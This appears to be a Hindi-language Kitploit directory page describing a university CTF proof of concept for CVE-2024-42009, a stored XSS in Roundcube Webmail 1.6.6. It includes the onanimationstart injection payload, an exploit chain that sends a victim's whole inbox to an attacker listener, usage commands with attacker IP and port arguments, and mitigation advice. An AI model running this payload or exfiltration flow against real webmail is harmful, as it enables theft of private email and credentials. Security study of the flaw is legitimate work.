Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-42009-roundcube-xss | Kitploit
उपकरण/GitHubGitHub/segunakinsoyinu/cve-2024-42009-roundcube-xss
फ़िशिंग उपकरणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubsegunakinsoyinu/cve-2024-42009-roundcube-xss

CVE-2024-42009-roundcube-xss

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

CVE-2024-42009 — Roundcube Webmail 1.6.6 Stored XSS PoC

केवल अधिकृत सुरक्षा परीक्षण, CTF वातावरण और शैक्षिक अनुसंधान के लिए।
इस टूल का उपयोग उन प्रणालियों के विरुद्ध करना जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति नहीं है, Computer Misuse Act 1990 (UK), CFAA (US) और दुनिया भर के समकक्ष कानूनों के तहत अवैध है।


भेद्यता सारांश

फ़ील्डविवरण
CVECVE-2024-42009
प्रभावित सॉफ़्टवेयरRoundcube Webmail ≤ 1.6.6
पैच किया गया संस्करण1.6.7 / 1.6.8
CVSS v3.1 स्कोर8.8 (उच्च)
CVSS वेक्टरAV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
CWECWE-79 — वेब पेज निर्माण के दौरान इनपुट का अनुचित न्यूट्रलाइज़ेशन (XSS)
हमले का प्रकारस्टोर्ड XSS → ज़ीरो-क्लिक ईमेल एक्सफ़िल्ट्रेशन
प्रमाणीकरण आवश्यककोई नहीं (SMTP डिलीवरी); कम (पीड़ित को ईमेल खोलना होगा)

यह कैसे काम करता है

Roundcube 1.6.6 का HTML सैनिटाइज़र एक गलत <body> टैग विशेषता के भीतर CSS एनीमेशन कीफ़्रेम से जुड़े JavaScript इवेंट हैंडलर को हटाने में विफल रहता है।

इंजेक्शन वेक्टर:

root@kitploit:~
<style>@keyframes x { from { opacity: 1; } to { opacity: 1; } }</style>
<body style="animation: x 0.001s;" onanimationstart="/* arbitrary JS */">

जब पीड़ित अपने प्रमाणित Roundcube सत्र में ईमेल खोलता है, तो CSS एनीमेशन तुरंत ट्रिगर होता है। onanimationstart हैंडलर rcmail JavaScript ऑब्जेक्ट तक पूर्ण पहुँच के साथ निष्पादित होता है, जिसमें सत्र का request_token भी शामिल है।

एक्सप्लॉइट श्रृंखला:

root@kitploit:~
1. Attacker sends malicious HTML email to victim via unauthenticated SMTP relay (port 25)
2. Victim opens email in Roundcube — animation fires, JS executes (zero clicks required)
3. JS reads rcmail.env.request_token (valid CSRF token for the session)
4. JS iterates all inbox UIDs via Roundcube's internal mail API
5. Each message is fetched and its content collected
6. All inbox data is POSTed as JSON to the attacker's HTTP listener
7. Attacker reads recovered emails — may contain credentials, session data, or sensitive communications

रिपॉजिटरी संरचना

root@kitploit:~
cve-2024-42009-roundcube-xss/
├── exploit.py       # Sends the XSS payload via unauthenticated SMTP
├── listener.py      # CORS-capable HTTP server; receives and prints exfiltrated inbox data
├── payload.html     # Standalone XSS payload for manual inspection or Burp delivery
└── README.md

आवश्यकताएँ

  • Python 3.7+
  • कोई बाहरी निर्भरता नहीं (केवल stdlib: smtplib, http.server, json, argparse)
  • लक्ष्य पर Roundcube Webmail ≤ 1.6.6 चल रहा होना चाहिए
  • लक्ष्य SMTP सर्वर को पोर्ट 25 पर बिना प्रमाणीकरण रिले की अनुमति देनी चाहिए (प्रयोगशाला वातावरण में सामान्य)

उपयोग

चरण 1 — लिसनर प्रारंभ करें (अपने हमलावर मशीन पर)

root@kitploit:~
python3 listener.py --port 8080

डेटा आने पर आउटपुट:

root@kitploit:~
[+] Exfiltration received from 192.168.62.128
[*] Session token : abc123...
[*] Emails captured: 19

  --- Email 1 ---
  UID     : 1
  From    : [email protected]
  Subject : SSH Access Credentials
  Body    : Your credentials are: ...

पूरा JSON डेटा स्वचालित रूप से exfil_dump.json में सहेजा जाता है।

चरण 2 — पेलोड वितरित करें

root@kitploit:~
python3 exploit.py \
  --smtp 192.168.62.128 \
  --port 25 \
  --from [email protected] \
  --to [email protected] \
  --attacker 192.168.62.129 \
  --lport 8080 \
  --subject "Security Advisory - Action Required"

चरण 3 — पीड़ित द्वारा ईमेल खोलने की प्रतीक्षा करें

एक बार ईमेल Roundcube Webmail ≤ 1.6.6 में खोले जाने पर, लिसनर एक्सफ़िल्ट्रेटेड इनबॉक्स सामग्री प्रिंट करेगा।


यह क्यों काम करता है (तकनीकी विवरण)

Roundcube का HTML प्यूरीफायर इनकमिंग ईमेल HTML रेंडर करने से पहले खतरनाक विशेषताओं को हटाने के लिए ज़िम्मेदार है। संस्करण ≤ 1.6.6 में, प्यूरीफायर onclick, onerror और इसी तरह के हैंडलर को सही ढंग से हटा देता है — लेकिन CSS एनीमेशन इवेंट (onanimationstart, onanimationend, onanimationiteration) पर इवेंट हैंडलर को नहीं हटाता है।

चूँकि CSS एनीमेशन रेंडरिंग के भाग के रूप में ट्रिगर होते हैं (उपयोगकर्ता इंटरैक्शन नहीं), हैंडलर ईमेल खोलते ही निष्पादित हो जाता है — न कोई लिंक क्लिक, न संदेश खोलने के अलावा कोई उपयोगकर्ता क्रिया।

rcmail JavaScript ऑब्जेक्ट हर प्रमाणित Roundcube सत्र में वैश्विक रूप से सुलभ है। यह rcmail.env.request_token उजागर करता है, जो सत्र का CSRF टोकन है। Roundcube के अपने mail API एंडपॉइंट्स (?_task=mail&_action=list, ?_action=show) के साथ मिलकर, पेलोड अतिरिक्त प्रमाणीकरण ट्रिगर किए बिना पूरा इनबॉक्स पढ़ सकता है।


प्रभावित संस्करण

संस्करणस्थिति
≤ 1.6.6असुरक्षित
1.6.7पैच किया गया
1.6.8पैच किया गया (अनुशंसित)
1.5.x LTSविक्रेता सलाह देखें

निवारण

कार्रवाईविवरण
अपग्रेडRoundcube 1.6.8 या उसके बाद का संस्करण इस प्रकार के XSS को पैच करता है
CSP हेडरवेबमेल vhost पर इनलाइन JS निष्पादन को रोकने के लिए Content-Security-Policy: default-src 'self'; script-src 'self' तैनात करें

संदर्भ

  • Roundcube सुरक्षा सलाह
  • NVD — CVE-2024-42009
  • OWASP Top 10 A03 — इंजेक्शन

खोजा / प्रदर्शित किया गया

इस PoC को MSc साइबर सुरक्षा, कॉवेंट्री विश्वविद्यालय (2025–2026) के एथिकल हैकिंग और पेनेट्रेशन टेस्टिंग मॉड्यूल में Boot-to-Root CTF पेनेट्रेशन टेस्टिंग मूल्यांकन के भाग के रूप में विकसित और परीक्षण किया गया था। सभी परीक्षण स्पष्ट लिखित प्राधिकरण के साथ एक अलग VMware प्रयोगशाला वातावरण में किए गए थे।

लेखक: Segun Akinsoyinu
पोर्टफोलियो: segunakinsoyinu.github.io/MyPortfolio


कानूनी नोटिस

यह कोड केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए जारी किया गया है। लेखक दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करता है। इस टूल का उपयोग करने से पहले, सुनिश्चित करें कि आपके पास लक्ष्य प्रणाली का परीक्षण करने के लिए स्पष्ट लिखित प्राधिकरण है।

टूल डाउनलोड करें
तर्कविवरण
--smtpलक्ष्य SMTP सर्वर का IP या होस्टनाम
--portSMTP पोर्ट (डिफ़ॉल्ट: 25)
--fromप्रेषक पता (रिले द्वारा स्वीकृत कोई भी मान)
--toपीड़ित का ईमेल पता
--attackerआपका IP — पेलोड में एक्सफ़िल कलेक्टर के रूप में एम्बेड किया गया
--lportआपका लिसनर पोर्ट (डिफ़ॉल्ट: 8080)
--subjectईमेल विषय पंक्ति
SMTP रिलेपोर्ट 25 पर बिना प्रमाणीकरण रिले अक्षम करें — सभी आंतरिक डिलीवरी के लिए AUTH अनिवार्य करें